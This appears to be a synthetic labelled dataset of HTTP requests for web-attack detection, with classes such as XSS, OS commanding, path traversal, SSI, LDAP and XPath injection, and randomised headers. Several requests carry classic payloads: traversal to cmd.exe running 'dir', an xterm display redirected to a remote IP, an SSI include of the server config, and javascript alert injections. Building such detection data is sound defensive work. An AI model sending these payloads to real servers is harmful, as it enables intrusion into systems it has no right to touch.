Date: Wed, 24 Sep 08 09:20:57 GMT
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sun, 11 Sep 05 07:10:35 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: "et5l2-rKm5wHYP0otux"
If-None-Match: *
If-Range: Wed, 31 Mar 04 05:59:30 CET
Max-Forwards: 1953
MIME-Version: 8.9
Pragma: un=MeaeHe1i
Proxy-Authorization: NTLM d29vc2FoY21qbE9uYW90ZW5jc2hzNnRpZWxvVGxPbjRlYWd0cjRl
Authorization: Digest uri=http://www.Imhpd.cz/sddou1og/9Osxt/aaxocdhm.fgf
Range: -99,17-4389
Referer: /srgnw/udarsmpm/rtd2/scnitre/oEa7Mw.avi
TE: deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: jn2fes9tI (zI@JgaNXs; eaLW7e4Oy; y6vV0vK; eWNPydC)
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.5 www.las2ets.jpg
Transfer-Encoding: identity
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46279
Start - Id: 35572
class: XPathInjection
POST /idoseb3tvsew.shtml? HTTP/1.1
Content-Length: 220
Content-Language: ouo,e0,pki0I
Content-Encoding: deflate
Content-Location: http://www.lhaas.fr/soszueoh/1Eyhwa/npeef/Fhsb.nsf
Content-MD5: bXVyZW52ZkxjcHNsZXVlTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Dec 05 03:10:10 UTC
Last-Modified: Fri, 08 May 09 03:56:33 GMT
Host: www.owreetlwwO.biz
Connection: close
Accept: application/zip;q=0.4, image/jpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Ensx-e;q=0.8, pfye-vetr;q=0.0, xtymNxE-ntv, odez-hrAys
Cache-Control: only-if-cached
Client-ip: 241.25.211.122
Date: Sat, 29 Nov 08 16:56:11 UTC
If-Modified-Since: Mon, 28 May 07 14:36:06 GMT
If-None-Match: "-ZLaHxzSNLYWqyPrM"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.1
Authorization: Basic c3l0aTpyZmV0bnNJ
Range: 92746-,306995-9206
Referer: http://www.nnAR.be/qeeete/44dimgt/aeIorayt.html
User-Agent: e9DNxd1C http://www.m5EaemY.de
UA-OS: Windows 98
Warning: 754 138.174.231.255:122 "usEresl" "Fri, 27 May 05 15:35:40 GMT"
X-Forwarded-For: 64.21.224.193

hnmF=1   or  count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1    or 458=&yfromJq9=1&tdosodgDrlxet=wdweUrhi

End - Id: 35572
Start - Id: 43187
class: OsCommanding
GET /r@i9il.cfm?epese66beqvf=ahoRx%288%2Fi%7CeRe0b%40ince&ltyxne=oglogss&Tfp3tac9tTw=aHh&itnPfcwt=Atpaari&tunot=33970520&ro5t5=t9dXa&fs4T5Uzi-GbetweenJ=elt&nrtTpniatur=%5Cr+++++xterm++++-display++++49.100.231.11%3A0.0&2rt=1231808385&uab7iaawtd=shhfe&9seIt=2sl&@Hp3Mg=edjAmtoti&xMf=Srw HTTP/1.0
Host: www.fabxy.ch
Connection: keep-alive
Accept: image/*, audio/basic;q=0.3, image/png;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, deflate
Accept-Language: cE9c-v, Hdd-ooAhs;q=0.7
Cache-Control: i=n
Client-ip: 177.135.197.204
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="8"
Date: Fri, 13 Oct 06 24:45:22 UTC
ETag: W/"46pzfwCzSZKUNdDPb-"
Expect: 100-continue
From: 9aythl@Osdt.st
If-Modified-Since: Thu, 29 Apr 04 10:38:25 CET
If-Unmodified-Since: Mon, 14 Apr 08 05:20:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: 3ndn s8tn=stem
Authorization: Basic ZHBudTk6ZmliSWVkaGU=
Range: 332370-1588,656-95
Referer: /oa8T9e/ayfto/i5nsny.mspx
TE: deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: 3ieftEpq7n (obxsv@lgj; 9noc@-M6; lzPanU0s; gmzV06w6E; 77Drvt8)
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: 0.1 www.eeelpgr.js, a2on/9.9 www.ia8a2ezO.gif
Transfer-Encoding: compress
Upgrade: sj4/4.6
Warning: 944 www.beyry.html:93 "LTbae5" "Mon, 05 Mar 07 08:57:49 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43187
Start - Id: 48094
class: XSS
GET /Jc9g/4tLf2UENE.tiff?aace7fn0es=%3Ca++++href+%3D%22++++javas%26%2399%3Bript%26%2335%3B%5Balert++%28%27nu%27%29%3B%5D+%22%3E&snv7trs1R=xQj1&kR1I=cizndsn6ibsEdnlw1&EbasseshmOey7=5040 HTTP/1.1
Host: 12.102.190.25
Connection: keep-alive
Accept: application/*, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: coaamo-WlIX;q=0.4, aocnAeii-aluthTd;q=0.2, ia4a-neeheuw, useg-ir;q=0.1, epee-y6e;q=0.9
Cache-Control: wyreogmC=y
Client-ip: 128.96.14.177
Cookie: ejuab8p=86;T_VZgS4=640596038;e7nbnfmjo=Lanntw3ehPgoticf;anHe9NhI0as=tmpaai
Cookie2: $Version="484"
Date: Wed, 10 Mar 04 12:54:42 UTC
ETag: "_kZg_@Z9twta657-o@Y"
Expect: 0oBnuh=bntvena
From: etsoAo6b@Dfeyr.ch
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: "GcE-g2tQMoCO8S4zzc4N"
If-Range: Mon, 15 Mar 10 24:20:14 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: ijdeiT kiao=mtjnUr
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.ccaumn.fr/xeNf/dwhTa/Hezuet/gobntct.mpg
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 1.6; Ac-bl; rv:6.8.6) Gecko/73672736
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 628 213.163.87.234 "snanhhatel" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48094
Start - Id: 39800
class: SSI
GET /hie4xwsuicF/u-1TGoHB/rf_jJ0mQ8_sk.swf?qYMV=w0liets&c1=9513487&wtniw=eair&bXTXwlah.p=oErdjImUniylryE&xarnmsett0jimin=+ss+aalogvm%25cgmaccess_log&b-pZTy9K=6&o5tiecnr8=sia7otA9etoero&rrsoo=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&mnDa7liuhc1pe=edliutaiq&delalrptv=aic&-Q@j=aod&toDutcthatea=91175266&olia=hmaEz5u HTTP/1.0
Host: www.Hcimsognct.org:0
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, iso-10646-ucs-2, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.98.95.119
Cookie: racRda5wruslh=a?g;oeermit=taQnih5e5tpc;nje=iaene2d;hrPvt5lhi9=QnZhS0
Cookie2: $Version="9"
Date: Wed, 17 May 06 05:56:55 CET
ETag: "q3Fsno.d.@JmHDHi"
Expect: omeToflz=ztetlio;erobtb
From: IninTta@sey4cto.cz
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Sun, 23 Oct 05 10:53:14 GMT
Max-Forwards: 0
MIME-Version: 1.9
Pragma: o=pmEtons
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: 2975-
Referer: http://www.dotir.cz/nrto8gwn/thLu0o.pdf
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: sExtShjgNU http://www.1tHno.fr
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: compress
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39800
Start - Id: 45164
class: PathTransversal
GET /../../? HTTP/1.0
Host: 248.225.13.48
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.3, isiri-3342, windows-1253, cp-936;q=0.7
Accept-Encoding: compress, compress;q=0.9, compress, compress;q=0.0
Accept-Language: ps-ao2o;q=0.2, btin8-tcpi;q=0.1
Cache-Control: only-if-cached
Client-ip: 3.86.215.159
Cookie: 4En9T4s=ecat@n'm| ei4bHa;84ihBadminihaving1C=zaxp_script$n;a0ytdyi=eae1rbmDr9a;tHctym=3;EsZjo=562430;JFsg-w.HQZu= lac yaThanaRz
Cookie2: $Version="70"
Date: Sat, 06 Jun 09 22:16:28 CET
ETag: W/"A2GfweKXm_TLmbvnWY"
Expect: 100-continue
From: hdOf9re@eutwEh.uk
If-Modified-Since: Sun, 29 Jan 06 23:54:29 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 8448
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: http://www.bdQt.ch/xi5Uq/thqr5gl/egncSEca.cgi
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/0.5 (X11; U; Open BSD i386 6.4; ab-n3; rv:7.1.4) Gecko/64605267
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45164
Start - Id: 49655
class: XPathInjection
GET /q@xZeF6netcat8/d7a77Bsa9V.oEau@0I/otc5s/Otpc0ExexecvL4/a64jebo.nV/aJ/hyTGKMN/rhgsJVK/ut/nhtpassFvard59.shtml?6X5ygeQh=thdCisnj&noLldaacnns=ifd%270f&tNhttpsR1hUT47fL=ugr&LeVR3p7styleY=nctrdS%2F4ew%2Fl%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D600%5D++++%7C+++++E%2Fgal5sD%2Ft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D76%5D+++or++%273uA8f%27+++%3D++%27&oi4AhnnEho=watreubadXs&Zupdaterxl_=rrtadcorh8&ceexnse=hTstZmitae&ua=thpieval2e%3C&esodin=I1cyesi&CPdy=58230&HKM5k6yfX=537&allT8tmpG2L=67025908&tNni=iRgtBKQK HTTP/1.1
Host: www.balNeemE.biz
Connection: Maprela
Accept: application/*;q=0.8, image/*, text/html;q=0.4
Accept-Charset: iso-2022-jp;q=0.6
Accept-Encoding: 
Accept-Language: da-hir;q=0.5, nsontfn-ca6lt
Cache-Control: no-store
Client-ip: 135.193.196.43
Cookie: 4zV57L=03300936;1odldzzexoxyhlN=3490295245;i7FBce=kbes;ox-l=-se4
Cookie2: $Version="12"
Date: Thu, 01 Jul 04 06:00:28 UTC
ETag: "XG5vP6R7j2LObHQwr_qp"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 21 May 05 13:56:57 UTC
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: *
If-None-Match: "bUhCLeXrmvwZKEl"
If-Range: *
Max-Forwards: 3842
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: nmahl elitnle=eupo
Range: -377,00-3
Referer: http://www.Nioss.biz/xt38.doc
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: ritzeihbLa/8.2.2.0.3
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 824 www.stbsbbt.html:52 "nn3oteHrle6uoaRrz" 
X-Forwarded-For: 18.19.238.4
X-Serial-Number: 38921697
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49655
Start - Id: 47722
class: XSS
GET /e-R5nx5Go1lPEoy.JcOv/xwRopeniperl2RCsy-/nr/6aneieioSixbwut1/koS/h1io9gfeeergen/oDkw/fGMp6w/iYbMyg-WeW6-1X1p.mspx?fOvdthe=mi6uidse2est&rdbhanhe0=apnb3-I7&ueoyy=%26%7B%5Balert+++%28%27ks3gsbr9%27%29%3B%5D%7D%3B&ghiee=nFl0V&bmthiisic=eeubNbeR HTTP/1.0
Host: www.jolvYtoizm.org
Connection: close
Accept: image/*;q=0.8, video/*, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.5, deflate, identity, gzip;q=0.6
Accept-Language: nehms-fQt, l-tp2q7;q=0.1, os-me, aTm-aeec
Cache-Control: oLlo='sjutu1'
Client-ip: 90.114.63.204
Cookie: BhEn=92309;etsenU=elinkhmeziiclrdropoM&k
Cookie2: $Version="7"
Date: Thu, 21 Jan 10 06:53:44 CET
ETag: W/".Yvf.hV0JUrMVXmG"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Wed, 30 Jan 08 04:36:06 UTC
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "uNpEbDHFRRaZIoPuI3"
If-None-Match: "ICfXt0tcyh3@APsya"
If-Range: *
Max-Forwards: 770
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest nc=dF111f86
Range: 2174-,56-,-57382
Referer: /he32df.swf
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 0.3; sh-lz; rv:3.0.1) Gecko/26176129
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5167x472
Via: FTP/1.6 70.92.247.158
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47722
Start - Id: 44686
class: PathTransversal
POST /7lhABAetcwgetWn/ia3au3aidB.htm? HTTP/1.1
Content-Length: 68
Content-Language: ocso,qtahitt
Content-Encoding: gzip
Content-Location: http://www.dcxm2e.cz/ucNb7a/isheiNs.doc
Content-MD5: b1kyc2p4YVR0dGRlOXVtcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Sep 08 04:18:23 UTC
Last-Modified: Wed, 01 Aug 07 15:45:45 CET
Host: 247.138.48.187
Connection: ieirWhio
Accept: video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 113.128.122.99
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="204"
Date: Mon, 09 Aug 04 16:37:52 GMT
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 12 Apr 10 01:01:59 UTC
If-Match: *
If-None-Match: "dr7q60SUwfpocpkYSr6"
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: http://www.i2le7t8.net/t7hs/fazbo/wibdi.tiff
TE: trailers,gzip,deflate
Trailer: Cache-Control
User-Agent: Mozilla/6.0 (compatible; tnLee; Unix; pe4oz)
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: tmdrac; pDl6ieer=tuge
Upgrade: 2dgtes/0.6
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

KB3d4wzbgsoundexecYEu=file:///5:/cagri/yDdin/znn.xml

End - Id: 44686
Start - Id: 44255
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.2isotle.biz
Connection: pez1i
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 182.20.30.117
Cookie: mteiae7re=9F7HkM;98juh=ki;iwa2uRLsjh= l;mnaNAoZe5hs=5-w
Cookie2: $Version="045"
Date: Wed, 20 Dec 06 03:04:10 UTC
ETag: "XGf1wALBxBWK5lr7R"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Tue, 19 Feb 08 04:29:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9526
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /aDEp/igehzeO0.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: crotlemN/5.6.3
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: nkcs/7.2 1.115.211.237, 9.3 70.234.89.40, 9.4 www.sce6ti.htm
Transfer-Encoding: identity
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44255
Start - Id: 39030
class: LdapInjection
POST /uiqyEOdGYJ/AHWvZ__S/yzlVQgA8/QPS_c/ewniscrg1/yncoqn8qeosnlbdhod.gif? HTTP/1.1
Content-Length: 233
Content-Language: O94d,g
Content-Encoding: gzip
Content-Location: /0yjerar/gitiue/R8liCee/ot2ue/0Xdmae36.php3
Content-MD5: cjRjZ204ZWtubG5udGZhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Oct 08 10:41:32 GMT
Last-Modified: Fri, 17 Oct 08 14:56:40 GMT
Host: 186.8.247.223:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-greek;q=0.7, euc-tw
Accept-Encoding: 
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: only-if-cached
Client-ip: 102.168.123.142
Cookie: Chmownoos3=oqGzTA;vd0RG=wcps4uBtV;iiEIeqzuf1tT=tenwpie%umthhhchildr;Id20dI-SYG=iacoqedlaoe;balTneoi=ae
Cookie2: $Version="927"
Date: Sun, 07 Feb 10 18:56:28 GMT
ETag: W/"S@-nxPLI7Fg30dSC"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Sat, 11 Sep 04 06:24:13 CET
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 06
MIME-Version: 9.1
Pragma: fh='Jas7'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Range: -15502
Referer: http://b2yysea.gov/csgsTbs/t3Sims/t6s8C.asmx
TE: chunked;q=0.7,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 7.4; ay-gs; rv:5.6.5) Gecko/28333052
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7332x461
Via: 7.0 82.187.230.104, 7.2 248.200.117.133:38
Transfer-Encoding: deflate
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -------------------
~~~~~: ~~~~~~~~~~~

unaeogh=br3inputotl04hf&qbn2ye=449&eaHsbnAsnT=oTPr&q8Onuy=0moObw&dnzttlpne9ru=x8@b.m&8i=4974545127&0nRallLMvAO=ls-shutdowni&pZwindow.openNselect_=iI6DEN&VvarpassthruwinntC=04b0ePk6&Sd64=doaolrks9n'e&passwdTpositionE7.c0=130868044

End - Id: 39030
Start - Id: 44444
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 0.255.33.203
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, identity, compress, deflate;q=0.5, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.115.52.160
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Fri, 22 Jan 10 10:43:48 GMT
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Mon, 22 Mar 04 16:14:03 UTC
If-Unmodified-Since: Mon, 24 Aug 09 02:46:52 GMT
If-Match: *
If-None-Match: "dhq44mKBQh5p1iZU"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 66
MIME-Version: 6.3
Pragma: eld='ro'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: http://hsql.be/sltjEe.asp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.5 (X11; U; Solaris 3.0; nn-ni; rv:9.2.5) Gecko/05040511
UA-CPU: Sparc
UA-Disp: 267,4051,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/2.9 www.Heqanhu5.htm, FTP/2.4 84.138.153.6:35
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 167.120.10.31
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44444
Start - Id: 38245
class: LdapInjection
GET /hXvjakICb/e8rc/8o7zkZK/q0dreplacee9Pfcfw/8Rf4./hD3nKacScR.php?eMinl5aroraen=sBrHYbzt7.&hdojrbunsah=iulunc%25%26lsEartvbscript%27eesusr&dh9nod0mst9NsIo=i&tEtf1q7=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.6yya7bAye.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, gzip;q=0.3
Accept-Language: gtimnrp-fesrur, d-Eu, u-fe8;q=0.6
Cache-Control: no-cache
Client-ip: 13.61.176.17
Cookie: fromat_open3likeB=840910737;eixdAtw=301013;i4lans3j=891;uZqLOw0a=fco
Cookie2: $Version="6"
Date: Tue, 18 Dec 07 11:06:57 CET
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sun, 01 Apr 07 07:07:28 GMT
If-Unmodified-Since: Tue, 21 Feb 06 20:08:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1307
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: wtahel auxc9d=5nTomi
Range: 49489-,4996-
Referer: http://ilednlee.be/uaeSm/tiDhu/n3ee9j/rtetd.aspx
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 7.8; Cs-eo; rv:5.3.0) Gecko/09305232
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: 7.5 231.130.163.48, FTP/3.4 145.200.243.249
Transfer-Encoding: mhnse; ua9c3=qoDaosef
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 6643372694358822
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38245
Start - Id: 36501
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 151.118.110.0:32056
Connection: qolagrty
Accept: video/*;q=0.4, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 71.53.140.2
Cookie: o4sthoErtnsv3i=ioIYyoduutcey;acm=95;b9n9t6gah=p@4T6;ues3shfecttre7=064214
Cookie2: $Version="050"
Date: Thu, 03 Jun 04 19:34:52 UTC
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Thu, 07 May 09 22:48:44 UTC
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 9509
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: osnreg sghsw=aqOrAfHc
Range: 998505-,-0540,815-
Referer: /9nEr/tieinWe/a3rmeg/ooiowlzc.css
TE: trailers,trailers,chunked;q=0.5
Trailer: From
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 3.6; so-tp; rv:0.3.8) Gecko/62306094
UA-CPU: MIPS
UA-Disp: 5117,829,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 512x1298
Via: HTTP/6.5 www.7xrEu.css:86
Transfer-Encoding: du620; dtea2=y57rt
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36501
Start - Id: 46627
class: XSS
GET /ufx./vwOBWSIQuArWiZ/sXxYZO1LJ/pE_LN2.ZLHgg5VaN/Eitr4nt.jpg?QoRvOw5null4=tgkaor HTTP/1.0
Host: 191.58.195.115:07
Connection: close
Accept: text/*, text/plain;q=0.5
Accept-Charset: iso-8859-8, x-mac-japanese, x-mac-turkish;q=0.6, iso-8859-8-i, euc-kr;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: <img     src    =  "javascript:    [alert ('eltE');]    "  >
Cache-Control: no-transform
Client-ip: 129.154.166.65
Cookie: 3wjhttpS@67=65
Cookie2: $Version="5"
Date: Thu, 22 May 08 15:43:30 CET
ETag: "hLyaMByyJCTCXQL5Zz8u"
Expect: 100-continue
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Tue, 24 Aug 04 15:54:19 UTC
If-None-Match: "xKH-WAALjNlvfIOToW"
If-Range: Mon, 19 May 08 10:17:04 GMT
Max-Forwards: 183
